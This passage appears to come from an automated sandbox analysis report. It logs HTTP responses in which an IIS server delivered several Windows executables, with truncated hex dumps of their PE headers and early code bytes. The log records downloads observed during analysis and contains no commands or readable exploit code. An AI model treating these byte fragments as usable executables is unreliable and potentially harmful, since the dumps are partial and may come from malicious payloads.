00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Tue, 09 Nov 2021 09:06:22 GMTAccept-Ranges: bytesETag: "0bbaf1049d5d71:0"Server: Microsoft-IIS/10.0Date: Tue, 19 Apr 2022 14:44:41 GMTContent-Length: 5673816Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e0 23 70 41 a4 42 1e 12 a4 42 1e 12 a4 42 1e 12 67 4d 11 12 a5 42 1e 12 a4 42 1f 12 d9 42 1e 12 67 4d 43 12 ab 42 1e 12 67 4d 41 12 84 42 1e 12 67 4d 40 12 a5 42 1e 12 67 4d 44 12 a5 42 1e 12 52 69 63 68 a4 42 1e 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 a0 6a 6b 47 00 00 00 00 00 00 00 00 e0 00 0f 0d 0b 01 07 0a 00 86 00 00 00 1a 00 00 00 00 00 00 ff 63 00 00 00 20 00 00 00 c0 00 00 00 00 00 01 00 20 00 00 00 02 00 00 05 00 02 00 05 00 02 00 04 00 00 00 00 00 00 00 00 00 02 00 00 04 00 00 52 0d 57 00 02 00 00 80 00 00 04 00 00 20 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 98 00 00 a0 00 00 00 00 e0 01 00 b4 17 00 00 00 00 00 00 00 00 00 00 00 7c 56 00 58 17 00 00 00 00 00 00 00 00 00 00 20 22 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 26 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1e 84 00 00 00 20 00 00 00 86 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f8 13 01 00 00 c0 00 00 00 02 00 00 00 8a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b4 17 00 00 00 e0 01 00 00 f0 55 00 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Tue, 09 Nov 2021 09:06:22 GMTAccept-Ranges: bytesETag: "0bbaf1049d5d71:0"Server: Microsoft-IIS/10.0Date: Tue, 19 Apr 2022 14:44:43 GMTContent-Length: 7195976Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4f f8 56 af 0b 99 38 fc 0b 99 38 fc 0b 99 38 fc 10 04 a6 fc 19 99 38 fc 10 04 92 fc 6e 99 38 fc 02 e1 bb fc 0e 99 38 fc 02 e1 ab fc 14 99 38 fc 0b 99 39 fc 49 98 38 fc 10 04 93 fc 6c 99 38 fc 10 04 a2 fc 0a 99 38 fc 0b 99 af fc 0a 99 38 fc 10 04 a5 fc 0a 99 38 fc 52 69 63 68 0b 99 38 fc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 1c ef 5f 53 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 8c 03 00 00 2c 02 00 00 00 00 00 1e 7e 02 00 00 10 00 00 00 a0 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 06 00 00 04 00 00 d6 bc 6e 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 74 21 05 00 2c 01 00 00 00 a0 05 00 e4 37 00 00 00 00 00 00 00 00 00 00 98 8e 6d 00 b0 3e 00 00 00 e0 05 00 24 32 00 00 f0 a4 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 1b 05 00 18 00 00 00 d8 1a 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 a0 03 00 80 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 8b 03 00 00 10 00 00 00 8c 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 ae 9a 01 00 00 a0 03 00 00 9c 01 00 00 90 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 20 30 00 00 00 40 05 00 00 10 00 00 00 2c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 77 69 78 62 75 72 6e 38 00 00 00 00 80 05 00 00 02 00 00 00 3c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 09 00 00 00 00 90 05 00 00 02 00 00 00 3e 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e4 37 00 00 00 a0 05 00 00 38 00 00 00 40 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 fa 42 00 00 00 e0 05 00 00 44 00 00 00 78 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/x-msdownloadLast-Modified: Tue, 09 Nov 2021 09:06:20 GMTAccept-Ranges: bytesETag: "08e7ef49d5d71:0"Server: Microsoft-IIS/10.0Date: Tue, 19 Apr 2022 14:44:45 GMTContent-Length: 12800Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 aa 5b 09 4c 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 2a 00 00 00 06 00 00 00 00 00 00 8e 49 00 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 00 00 00 02 00 00 b6 f0 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 49 00 00 4b 00 00 00 00 60 00 00 c0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 0c 00 00 00 9c 48 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 94 29 00 00 00 20 00 00 00 2a 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 c0 03 00 00 00 60 00 00 00 04 00 00 00 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 00 00 00 02 00 00 00 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 49 00 00 00 00 00 00 48 00 00 00 02 00 05 00 10 29 00 00 8c 1f 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 20 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f9 ac a6 fe e9 b8 67 38 51 5d 37 fd ac ac d5 9c 0d 7e d5 84 3f 0e ae 19 6d cb 4e 5b 9c b0 21 a4 ff 2e 5e 01 ed 4f 4a bf f0 ee 90 48 66 5e 97 3e d8 d1 e4 29 6e f0 2f ef 4b 6a 68 09 48 3a b9 23 96 39 12 b2 d3 6c 98 7c 56 4c 6a de 3d 05 6f 73 52 df c9 1c 7e 9a d5 8e a6 9f 52 cd 31 8b b6 f0 de 5b e9 84 5c 68 de 79 74 94 af a5 79 52 6e d9 ec 41 d2 97 57 22 fa 91 5f 04 53 b8 54 24 b9 53 1e 02 73 09 00 00 06 2a 22 0f 00 28 0a 00 00 06 2a 86 02 7b 04 00 00 04 0f 01 7b 04 00 00 04 33 10 02 7b 03 00 00 04 0f 01 7b 03 00 00 04 fe 01 2a 16 2a 5e 03 75 02 00 00 02 2c 0d 02 03 a5 02 00 00 02 28 03 00 00 06 2a 16 2a 26 0f 00 03 28 03 00 00 06 2a 2e 02 03 28 05 00 00 06 16 fe 01 2a 32 02 71 02 00 00 02 28 02 00 00 06 2a 00 00 13 30 02 00 19 00 00 00 01 00 00 11 02 71 02 00 00 02 28 02 00 00 06 0a 12 00 28 15 00 00 0a 28 16 00 00 0a 2a 52 02 03 1f 10 63 d2 7d 04 00 00 04 02 03 d1 7d 03 00 00 04 2a 46 02 7b 04 00 00 04 1f 10 62 02 7b 03 00 00 04 58 2a 42 20 ff ff ff 00 28 01 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/x-msdownloadLast-Modified: Tue, 09 Nov 2021 09:06:20 GMTAccept-Ranges: bytesETag: "08e7ef49d5d71:0"Server: Microsoft-IIS/10.0Date: Tue, 19 Apr 2022 14:44:45 GMTContent-Length: 72704Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 da 18 41 5c 9e 79 2f 0f 9e 79 2f 0f 9e 79 2f 0f 97 01 bc 0f 9c 79 2f 0f 80 2b bc 0f 9c 79 2f 0f f1 0f b3 0f 9b 79 2f 0f 0d 37 b7 0f 9f 79 2f 0f f1 0f 85 0f 97 79 2f 0f b9 bf 54 0f 9c 79 2f 0f 9e 79 2e 0f c9 79 2f 0f f1 0f 84 0f bb 79 2f 0f f1 0f b2 0f 9f 79 2f 0f 52 69 63 68 9e 79 2f 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 d6 5b 09 4c 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0a 00 00 4c 00 00 00 cc 00 00 00 00 00 00 6c 57 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 80 01 00 00 04 00 00 6f b6 01 00 02 00 40 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 1c 28 01 00 78 00 00 00 00 60 01 00 b4 01 00 00 00 50 01 00 f0 00 00 00 00 00 00 00 00 00 00 00 00 70 01 00 28 00 00 00 60 73 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 c8 02 00 00 00 00 00 00 00 00 00 00 7c 73 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0f 49 00 00 00 10 00 00 00 4a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 6e 65 70 00 00 00 00 50 00 00 00 00 60 00 00 00 02 00 00 00 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 52 c2 00 00 00 70 00 00 00 c4 00 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 05 00 00 00 40 01 00 00 02 00 00 00 14 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 f0 00 00 00 00 50 01 00 00 02 00 00 00 16 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 b4 01 00 00 00 60 01 00 00 02 00 00 00 18 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 00 01 00 00 00 70 01 00 00 02 00 00 00 1a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/x-msdownloadLast-Modified: Tue, 09 Nov 2021 09:06:20 GMTAccept-Ranges: bytesETag: "08e7ef49d5d71:0"Server: Microsoft-IIS/10.0Date: Tue, 19 Apr 2022 14:44:46 GMTContent-Length: 11264Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 dd 5b 09 4c 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 22 00 00 00 08 00 00 00 00 00 00 de 41 00 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 00 00 00 02 00 00 fe a5 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 8c 41 00 00 4f 00 00 00 00 60 00 00 20 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 0c 00 00 00 d0 40 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e4 21 00 00 00 20 00 00 00 22 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 20 04 00 00 00 60 00 00 00 06 00 00 00 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 00 00 00 02 00 00 00 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 41 00 00 00 00 00 00 48 00 00 00 02 00 05 00 94 25 00 00 3c 1b 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 20 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 97 5b 3a 40 b2 ee 38 54 8b 8f fb 25 40 5e 73 f2 8c 21 80 83 0e 21 01 18 d5 4c 39 ad 23 20 1e 6f b9 dc aa 9c e4 90 72 c9 c9 09 b3 09 04 91 b9 ca 18 2f 3a 8f fd 0f d4 4f 82 52 03 9a ed 5c da 7d 97 5e 54 fa 92 49 20 d4 73 50 0f 1a a6 5e 47 af e8 f3 79 a9 b8 bb 61 fb eb a7 61 20 5e 7a 95 ce 55 56 46 46 12 6e 33 af 7c 3e d5 8a 9c 28 e6 71 bf 30 7d 21 d8 ef 8c 94 ef 54 d4 8d f5 3b b0 24 13 30 05 00 67 00 00 00 01 00 00 11 02 2d 0b 72 01 00 00 70 73 14 00 00 0a 7a 02 6f 15 00 00 0a 0a 06 72 23 00 00 70 1a 6f 16 00 00 0a 2d 2e 28 17 00 00 0a 72 4d 00 00 70 18 8d 01 00 00 01 0b 07 16 02 6f 15 00 00 0a a2 07 17 72 23 00 00 70 a2 07 28 18 00 00 0a 73 19 00 00 0a 7a 02 6f 15 00 00 0a 72 23 00 00 70 6f 1a 00 00 0a 6f 1b 00 00 0a 2a 00 1b 30 04 00 51 00 00 00 02 00 00 11 02 28 01 00 00 06 0a 7e 1c 00 00 0a 72 bf 00 00 70 06 72 62 01 00 70 28 1d 00 00 0a 6f 1e 00 00 0a 0b 07 72 7a 01 00 70 6f 1f 00 00 0a 75 1e 00 00 01 0c 08 2d 0b 72 96 01 00 70 73 19 00 00 0a 7a 08 0d de 0a 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/x-msdownloadLast-Modified: Tue, 09 Nov 2021 09:06:20 GMTAccept-Ranges: bytesETag: "08e7ef49d5d71:0"Server: Microsoft-IIS/10.0Date: Tue, 19 Apr 2022 14:44:46 GMTContent-Length: 157184Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 af 5b 09 4c 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 5e 02 00 00 06 00 00 00 00 00 00 3e 7c 02 00 00 20 00 00 00 80 02 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 02 00 00 02 00 00 e4 6c 02 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f0 7b 02 00 4b 00 00 00 00 80 02 00 b0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 02 00 0c 00 00 00 44 7b 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 5c 02 00 00 20 00 00 00 5e 02 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 b0 03 00 00 00 80 02 00 00 04 00 00 00 60 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 02 00 00 02 00 00 00 64 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 7c 02 00 00 00 00 00 48 00 00 00 02 00 05 00 d4 b7 00 00 70 c3 01 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 20 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 22 df ba d6 2d 66 01 7c fe fa e9 e8 aa 5d 83 ff 3f a3 6d 3f 3f 41 30 23 4a dd ad 3b 3e 2c 64 7d 43 38 3b 4f 81 18 29 03 aa 4a 4c 3c 3c 0c bd f6 48 29 8b d0 bc b6 e8 a8 cf fa c6 60 b4 ee 86 2a 85 a0 28 d4 a1 40 f6 55 12 c8 c6 52 f4 28 f8 41 0b 3b 60 4f 4e 4c a6 bc 4b 5f 0c 07 ed ff 2f f9 36 6a 6c 11 e1 db b3 26 9d 66 8b 3e df 18 9e f3 4e 61 1e 9d cd 37 2d 08 54 5c b3 b0 04 3e e3 1a 1e 02 28 18 00 00 0a 2a 1a 7e 1b 00 00 04 2a 1a 7e 1c 00 00 04 2a 1e 02 7b 1d 00 00 04 2a 52 02 28 09 00 00 06 03 74 05 00 00 02 6f 09 00 00 06 fe 01 2a 36 03 2d 02 16 2a 02 03 6f 03 00 00 06 2a 36 02 03 75 05 00 00 02 6f 0b 00 00 06 2a 46 02 28 09 00 00 06 8c 37 00 00 02 6f 19 00 00 0a 2a 46 02 28 09 00 00 06 8c 37 00 00 02 6f 1a 00 00 0a 2a 00 13 30 05 00 43 00 00 00 01 00 00 11 04 4a 05 58 0a 04 4a 06 33 02 14 2a 03 04 25 4a 25 0c 17 58 54 08 91 0b 07 0d 09 45 02 00 00 00 02 00 00 00 08 00 00 00 2b 0c 28 07 00 00 06 2a 28 08 00 00 06 2a 07 03 04 06 04 4a 59 28 1b 00 00 0a 2a 00 13
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/x-msdownloadLast-Modified: Tue, 09 Nov 2021 09:06:20 GMTAccept-Ranges: bytesETag: "08e7ef49d5d71:0"Server: Microsoft-IIS/10.0Date: Tue, 19 Apr 2022 14:44:47 GMTContent-Length: 94720Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 93 4a 09 4c 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 6a 01 00 00 06 00 00 00 00 00 00 fe 87 01 00 00 20 00 00 00 a0 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 01 00 00 02 00 00 6c 4c 02 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ac 87 01 00 4f 00 00 00 00 a0 01 00 d8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 01 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 04 68 01 00 00 20 00 00 00 6a 01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d8 03 00 00 00 a0 01 00 00 04 00 00 00 6c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 01 00 00 02 00 00 00 70 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 87 01 00 00 00 00 00 48 00 00 00 02 00 05 00 30 c1 00 00 7c c6 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 20 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e5 92 e8 75 c1 6f 03 3c 21 cb 8d 71 91 eb 85 00 67 19 f9 fe 42 10 2f 0b a0 7f d9 bb df ca ff f8 ce e3 57 bb c6 be 70 18 d7 b5 77 74 5c af f4 58 c1 e9 ae 2f 7b 24 8e 22 7c 3d 61 47 a8 15 04 ba 06 6b ad e5 67 61 4c c5 23 6f cc f1 64 c7 24 ce 86 ef c4 9c c3 11 b5 ca ca 39 5d 11 2c e9 cb a2 a9 32 96 26 d3 98 cd d4 b4 a6 68 6c 6d 85 8b 6b 33 51 07 ac e3 4d 73 7c 03 c2 5b 06 3f aa 94 75 13 30 08 00 5a 00 00 00 01 00 00 11 02 6f d5 00 00 0a 0a 20 88 dc 7a 3c 03 58 0b 16 25 17 32 33 25 0c 06 08 06 08 92 25 20 ff 00 00 00 5f 07 25 17 58 0b 61 d2 0d 25 1e 63 07 25 17 58 0b 61 d2 13 04 26 11 04 09 13 04 0d 11 04 1e 62 09 60 d1 9d 17 58 25 06 8e 69 32 c7 26 06 73 d6 00 00 0a 28 d7 00 00 0a 2a 00 00 13 30 02 00 15 00 00 00 00 00 00 00 02 25 28 21 00 00 0a 03 7d 01 00 00 04 02 04 7d 02 00 00 04 2a 00 00 00 13 30 01 00 07 00 00 00 00 00 00 00 02 7b 01 00 00 04 2a 00 13 30 01 00 07 00 00 00 00 00 00 00 02 7b 02 00 00 04 2a 00 13 30 02 00 1c 00 00 00 00 00 00 00 03 2d 0d 7e 06 0

Source: unknown

